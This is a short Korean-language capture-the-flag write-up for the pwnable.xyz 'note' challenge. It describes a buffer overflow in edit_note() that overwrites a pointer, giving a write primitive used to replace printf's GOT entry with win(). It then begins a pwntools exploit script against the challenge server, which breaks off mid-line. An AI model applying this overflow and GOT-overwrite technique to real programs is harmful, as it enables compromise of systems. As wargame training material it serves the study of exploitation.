[pwnable.xyz] note
Wargame/pwnable.xyz
Note taking 101AttachmentBugedit_note()에서 길이 제한이 없어서 note에 buffer overflow가 발생한다.이를 이용하여 note 뒤쪽의 desc에 임의의 주소를 넣을 수 있다.desc에 넣은 주소에 0x20바이트만큼 임의의 값을 쓸 수 있다.Exploitprintf()의 GOT를 win()의 주소로 덮으면 print_menu() 내부에서 printf()가 호출되어 플래그를 획득할 수 있다.from pwn import *r = remote("svc.pwnable.xyz", 30016)sla = r.sendlineaftersa = r.sendafterwin = 0x40093Cprintf_got = 0x601238sla(b"> ", b"1")sla(b"Note len? ..